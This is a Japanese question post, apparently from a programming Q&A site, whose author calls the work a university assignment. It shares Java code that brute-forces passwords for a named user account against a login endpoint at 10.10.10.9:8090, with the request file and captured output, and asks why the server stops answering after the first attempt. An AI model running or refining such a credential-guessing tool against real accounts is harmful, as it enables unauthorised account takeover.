私は、大学の課題の一環としてブルート フォース アルゴリズムを実装していました。私のプログラムは、毎回異なるパスワードで投稿要求をサーバーに送信します。問題は、最初のリクエストに対してのみ応答を取得し、その後のリクエストに対してサーバーがまったく応答しないことです。
これがコードです。
ブルートフォース.java
import java.io.*;
import java.net.*;
class BruteForce
{
private byte[] seq = new byte[]{0,0,0,0,0,0};
private char[] map = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".toCharArray();
public static void main(String[] args) throws IOException
{
BruteForce bf = new BruteForce();
bf.go(args[0]);
}
public void next(int i)
{
seq[i]++;
if(seq[i]==62)
{
seq[i]=0;
next(i-1);
}
}
public void go(String st) throws IOException
{
int l;
RequestReader reqMan = new RequestReader();
String t[] = reqMan.constructRequestString(new File(st));
String header = t[0];
String param = t[1];
t = null;
//SocketAddress addr = new InetSocketAddress("127.0.0.1", 8888);
//Proxy proxy = new Proxy(Proxy.Type.SOCKS, addr);
Socket s = new Socket();
InetSocketAddress dest = new InetSocketAddress("10.10.10.9", 8090);
s.connect(dest);
BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream()));
PrintWriter w = new PrintWriter(s.getOutputStream());
//Actual BruteForce Algorithm
int index = 5;
while(seq[0] != 1)
{
String pass="";
//for(int j=0;j<6;j++)
//System.out.print(seq[j]+" ");
//System.out.println();
for(int i=1;i<=5;i++)
{
pass = pass + map[seq[i]];
}
//r = new BufferedReader(new InputStreamReader(s.getInputStream()));
String tp = header + "\n\n" + param.replace("password=","password="+pass);
System.out.println(tp);
w.write(tp);
w.flush();
while((l=r.read())!=-1)
System.out.print((char)l);
System.out.println();
try
{
Thread.sleep(10000);
}
catch(Exception e)
{}
next(index);
}
}
}
RequestReader.java
import java.io.*;
class RequestReader
{
public static void main(String[] args) throws IOException
{
RequestReader reqRead = new RequestReader();
String[] t = reqRead.constructRequestString(new File(args[0]));
System.out.print(t[0]+"\n"+t[1]);
}
public String[] constructRequestString(File f) throws IOException
{
String temp="";
int ch;
BufferedReader in = new BufferedReader(new InputStreamReader(new FileInputStream(f)));
while((ch=in.read())!= -1)
{
temp += (char)ch;
}
//System.out.print(temp);
String[] tokens = temp.split("\n\n");
tokens[1] = tokens[1].replace("\n",""); //'\n' is automatically added to the end of string while reading. This line truncates '\n'.
in.close();
return tokens;
}
}
ファイル
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=&a=1379675423937&producttype=0
結果
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaaa&a=1379675423937&producttype=0
HTTP/1.1 200 OK
Connection: close
Content-Type: text/xml
<?xml version='1.0' ?><requestresponse><status>LOGIN</status><message><![CDATA[The system could not log you on. Make sure your password is correct]]></message><logoutmessage>You have successfully logged off</logoutmessage><state></state></requestresponse>
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaab&a=1379675423937&producttype=0
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaac&a=1379675423937&producttype=0
POST /login.xml HTTP/1.1
Host: 10.10.10.9:8090
Connection: keep-alive
Content-Length: 90
Origin: http://10.10.10.9:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.10.10.9:8090/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
mode=191&username=syedshahyasser.hussain.it14&password=aaaad&a=1379675423937&producttype=0
ご覧のとおり、最初のリクエストとレスポンスは正常に動作します。それ以降、リクエストは送信されますが、レスポンスが届きません。